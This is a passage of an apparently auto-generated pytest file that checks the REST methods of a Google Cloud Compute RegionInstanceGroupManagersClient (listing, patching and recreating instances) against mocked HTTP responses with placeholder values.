response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.list(request)
def test_list_rest_from_dict():
test_list_rest(request_type=dict)
def test_list_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.RegionInstanceGroupManagerList()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.RegionInstanceGroupManagerList.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {"project": "sample1", "region": "sample2"}
# get truthy value for each flattened field
mock_args = dict(project="project_value", region="region_value",)
mock_args.update(sample_request)
client.list(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers"
% client.transport._host,
args[1],
)
def test_list_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list(
compute.ListRegionInstanceGroupManagersRequest(),
project="project_value",
region="region_value",
)
def test_list_rest_pager():
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# TODO(kbandes): remove this mock unless there's a good reason for it.
# with mock.patch.object(path_template, 'transcode') as transcode:
# Set the response as a series of pages
response = (
compute.RegionInstanceGroupManagerList(
items=[
compute.InstanceGroupManager(),
compute.InstanceGroupManager(),
compute.InstanceGroupManager(),
],
next_page_token="abc",
),
compute.RegionInstanceGroupManagerList(items=[], next_page_token="def",),
compute.RegionInstanceGroupManagerList(
items=[compute.InstanceGroupManager(),], next_page_token="ghi",
),
compute.RegionInstanceGroupManagerList(
items=[compute.InstanceGroupManager(), compute.InstanceGroupManager(),],
),
)
# Two responses for two calls
response = response + response
# Wrap the values into proper Response objs
response = tuple(
compute.RegionInstanceGroupManagerList.to_json(x) for x in response
)
return_values = tuple(Response() for i in response)
for return_val, response_val in zip(return_values, response):
return_val._content = response_val.encode("UTF-8")
return_val.status_code = 200
req.side_effect = return_values
sample_request = {"project": "sample1", "region": "sample2"}
pager = client.list(request=sample_request)
results = list(pager)
assert len(results) == 6
assert all(isinstance(i, compute.InstanceGroupManager) for i in results)
pages = list(client.list(request=sample_request).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
def test_list_errors_rest(
transport: str = "rest",
request_type=compute.ListErrorsRegionInstanceGroupManagersRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.RegionInstanceGroupManagersListErrorsResponse(
next_page_token="next_page_token_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.RegionInstanceGroupManagersListErrorsResponse.to_json(
return_value
)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.list_errors(request)
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListErrorsPager)
assert response.next_page_token == "next_page_token_value"
def test_list_errors_rest_bad_request(
transport: str = "rest",
request_type=compute.ListErrorsRegionInstanceGroupManagersRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.list_errors(request)
def test_list_errors_rest_from_dict():
test_list_errors_rest(request_type=dict)
def test_list_errors_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.RegionInstanceGroupManagersListErrorsResponse()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.RegionInstanceGroupManagersListErrorsResponse.to_json(
return_value
)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
)
mock_args.update(sample_request)
client.list_errors(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}/listErrors"
% client.transport._host,
args[1],
)
def test_list_errors_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_errors(
compute.ListErrorsRegionInstanceGroupManagersRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
)
def test_list_errors_rest_pager():
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# TODO(kbandes): remove this mock unless there's a good reason for it.
# with mock.patch.object(path_template, 'transcode') as transcode:
# Set the response as a series of pages
response = (
compute.RegionInstanceGroupManagersListErrorsResponse(
items=[
compute.InstanceManagedByIgmError(),
compute.InstanceManagedByIgmError(),
compute.InstanceManagedByIgmError(),
],
next_page_token="abc",
),
compute.RegionInstanceGroupManagersListErrorsResponse(
items=[], next_page_token="def",
),
compute.RegionInstanceGroupManagersListErrorsResponse(
items=[compute.InstanceManagedByIgmError(),], next_page_token="ghi",
),
compute.RegionInstanceGroupManagersListErrorsResponse(
items=[
compute.InstanceManagedByIgmError(),
compute.InstanceManagedByIgmError(),
],
),
)
# Two responses for two calls
response = response + response
# Wrap the values into proper Response objs
response = tuple(
compute.RegionInstanceGroupManagersListErrorsResponse.to_json(x)
for x in response
)
return_values = tuple(Response() for i in response)
for return_val, response_val in zip(return_values, response):
return_val._content = response_val.encode("UTF-8")
return_val.status_code = 200
req.side_effect = return_values
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
pager = client.list_errors(request=sample_request)
results = list(pager)
assert len(results) == 6
assert all(isinstance(i, compute.InstanceManagedByIgmError) for i in results)
pages = list(client.list_errors(request=sample_request).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
def test_list_managed_instances_rest(
transport: str = "rest",
request_type=compute.ListManagedInstancesRegionInstanceGroupManagersRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.RegionInstanceGroupManagersListInstancesResponse(
next_page_token="next_page_token_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.RegionInstanceGroupManagersListInstancesResponse.to_json(
return_value
)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.list_managed_instances(request)
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListManagedInstancesPager)
assert response.next_page_token == "next_page_token_value"
def test_list_managed_instances_rest_bad_request(
transport: str = "rest",
request_type=compute.ListManagedInstancesRegionInstanceGroupManagersRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.list_managed_instances(request)
def test_list_managed_instances_rest_from_dict():
test_list_managed_instances_rest(request_type=dict)
def test_list_managed_instances_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.RegionInstanceGroupManagersListInstancesResponse()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.RegionInstanceGroupManagersListInstancesResponse.to_json(
return_value
)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
)
mock_args.update(sample_request)
client.list_managed_instances(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}/listManagedInstances"
% client.transport._host,
args[1],
)
def test_list_managed_instances_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_managed_instances(
compute.ListManagedInstancesRegionInstanceGroupManagersRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
)
def test_list_managed_instances_rest_pager():
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# TODO(kbandes): remove this mock unless there's a good reason for it.
# with mock.patch.object(path_template, 'transcode') as transcode:
# Set the response as a series of pages
response = (
compute.RegionInstanceGroupManagersListInstancesResponse(
managed_instances=[
compute.ManagedInstance(),
compute.ManagedInstance(),
compute.ManagedInstance(),
],
next_page_token="abc",
),
compute.RegionInstanceGroupManagersListInstancesResponse(
managed_instances=[], next_page_token="def",
),
compute.RegionInstanceGroupManagersListInstancesResponse(
managed_instances=[compute.ManagedInstance(),], next_page_token="ghi",
),
compute.RegionInstanceGroupManagersListInstancesResponse(
managed_instances=[
compute.ManagedInstance(),
compute.ManagedInstance(),
],
),
)
# Two responses for two calls
response = response + response
# Wrap the values into proper Response objs
response = tuple(
compute.RegionInstanceGroupManagersListInstancesResponse.to_json(x)
for x in response
)
return_values = tuple(Response() for i in response)
for return_val, response_val in zip(return_values, response):
return_val._content = response_val.encode("UTF-8")
return_val.status_code = 200
req.side_effect = return_values
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
pager = client.list_managed_instances(request=sample_request)
results = list(pager)
assert len(results) == 6
assert all(isinstance(i, compute.ManagedInstance) for i in results)
pages = list(client.list_managed_instances(request=sample_request).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
def test_list_per_instance_configs_rest(
transport: str = "rest",
request_type=compute.ListPerInstanceConfigsRegionInstanceGroupManagersRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.RegionInstanceGroupManagersListInstanceConfigsResp(
next_page_token="next_page_token_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.RegionInstanceGroupManagersListInstanceConfigsResp.to_json(
return_value
)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.list_per_instance_configs(request)
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListPerInstanceConfigsPager)
assert response.next_page_token == "next_page_token_value"
def test_list_per_instance_configs_rest_bad_request(
transport: str = "rest",
request_type=compute.ListPerInstanceConfigsRegionInstanceGroupManagersRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.list_per_instance_configs(request)
def test_list_per_instance_configs_rest_from_dict():
test_list_per_instance_configs_rest(request_type=dict)
def test_list_per_instance_configs_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.RegionInstanceGroupManagersListInstanceConfigsResp()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.RegionInstanceGroupManagersListInstanceConfigsResp.to_json(
return_value
)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
)
mock_args.update(sample_request)
client.list_per_instance_configs(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}/listPerInstanceConfigs"
% client.transport._host,
args[1],
)
def test_list_per_instance_configs_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_per_instance_configs(
compute.ListPerInstanceConfigsRegionInstanceGroupManagersRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
)
def test_list_per_instance_configs_rest_pager():
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# TODO(kbandes): remove this mock unless there's a good reason for it.
# with mock.patch.object(path_template, 'transcode') as transcode:
# Set the response as a series of pages
response = (
compute.RegionInstanceGroupManagersListInstanceConfigsResp(
items=[
compute.PerInstanceConfig(),
compute.PerInstanceConfig(),
compute.PerInstanceConfig(),
],
next_page_token="abc",
),
compute.RegionInstanceGroupManagersListInstanceConfigsResp(
items=[], next_page_token="def",
),
compute.RegionInstanceGroupManagersListInstanceConfigsResp(
items=[compute.PerInstanceConfig(),], next_page_token="ghi",
),
compute.RegionInstanceGroupManagersListInstanceConfigsResp(
items=[compute.PerInstanceConfig(), compute.PerInstanceConfig(),],
),
)
# Two responses for two calls
response = response + response
# Wrap the values into proper Response objs
response = tuple(
compute.RegionInstanceGroupManagersListInstanceConfigsResp.to_json(x)
for x in response
)
return_values = tuple(Response() for i in response)
for return_val, response_val in zip(return_values, response):
return_val._content = response_val.encode("UTF-8")
return_val.status_code = 200
req.side_effect = return_values
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
pager = client.list_per_instance_configs(request=sample_request)
results = list(pager)
assert len(results) == 6
assert all(isinstance(i, compute.PerInstanceConfig) for i in results)
pages = list(client.list_per_instance_configs(request=sample_request).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
def test_patch_rest(
transport: str = "rest", request_type=compute.PatchRegionInstanceGroupManagerRequest
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init["instance_group_manager_resource"] = compute.InstanceGroupManager(
auto_healing_policies=[
compute.InstanceGroupManagerAutoHealingPolicy(
health_check="health_check_value"
)
]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.patch(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_patch_rest_bad_request(
transport: str = "rest", request_type=compute.PatchRegionInstanceGroupManagerRequest
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init["instance_group_manager_resource"] = compute.InstanceGroupManager(
auto_healing_policies=[
compute.InstanceGroupManagerAutoHealingPolicy(
health_check="health_check_value"
)
]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.patch(request)
def test_patch_rest_from_dict():
test_patch_rest(request_type=dict)
def test_patch_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
instance_group_manager_resource=compute.InstanceGroupManager(
auto_healing_policies=[
compute.InstanceGroupManagerAutoHealingPolicy(
health_check="health_check_value"
)
]
),
)
mock_args.update(sample_request)
client.patch(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}"
% client.transport._host,
args[1],
)
def test_patch_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.patch(
compute.PatchRegionInstanceGroupManagerRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
instance_group_manager_resource=compute.InstanceGroupManager(
auto_healing_policies=[
compute.InstanceGroupManagerAutoHealingPolicy(
health_check="health_check_value"
)
]
),
)
def test_patch_per_instance_configs_rest(
transport: str = "rest",
request_type=compute.PatchPerInstanceConfigsRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_manager_patch_instance_config_req_resource"
] = compute.RegionInstanceGroupManagerPatchInstanceConfigReq(
per_instance_configs=[
compute.PerInstanceConfig(fingerprint="fingerprint_value")
]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.patch_per_instance_configs(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_patch_per_instance_configs_rest_bad_request(
transport: str = "rest",
request_type=compute.PatchPerInstanceConfigsRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_manager_patch_instance_config_req_resource"
] = compute.RegionInstanceGroupManagerPatchInstanceConfigReq(
per_instance_configs=[
compute.PerInstanceConfig(fingerprint="fingerprint_value")
]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.patch_per_instance_configs(request)
def test_patch_per_instance_configs_rest_from_dict():
test_patch_per_instance_configs_rest(request_type=dict)
def test_patch_per_instance_configs_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_manager_patch_instance_config_req_resource=compute.RegionInstanceGroupManagerPatchInstanceConfigReq(
per_instance_configs=[
compute.PerInstanceConfig(fingerprint="fingerprint_value")
]
),
)
mock_args.update(sample_request)
client.patch_per_instance_configs(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}/patchPerInstanceConfigs"
% client.transport._host,
args[1],
)
def test_patch_per_instance_configs_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.patch_per_instance_configs(
compute.PatchPerInstanceConfigsRegionInstanceGroupManagerRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_manager_patch_instance_config_req_resource=compute.RegionInstanceGroupManagerPatchInstanceConfigReq(
per_instance_configs=[
compute.PerInstanceConfig(fingerprint="fingerprint_value")
]
),
)
def test_recreate_instances_rest(
transport: str = "rest",
request_type=compute.RecreateInstancesRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_managers_recreate_request_resource"
] = compute.RegionInstanceGroupManagersRecreateRequest(
instances=["instances_value"]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.recreate_instances(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_recreate_instances_rest_bad_request(
transport: str = "rest",
request_type=compute.RecreateInstancesRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_managers_recreate_request_resource"
] = compute.RegionInstanceGroupManagersRecreateRequest(
instances=["instances_value"]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.recreate_instances(request)
def test_recreate_instances_rest_from_dict():
test_recreate_instances_rest(request_type=dict)
def test_recreate_instances_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
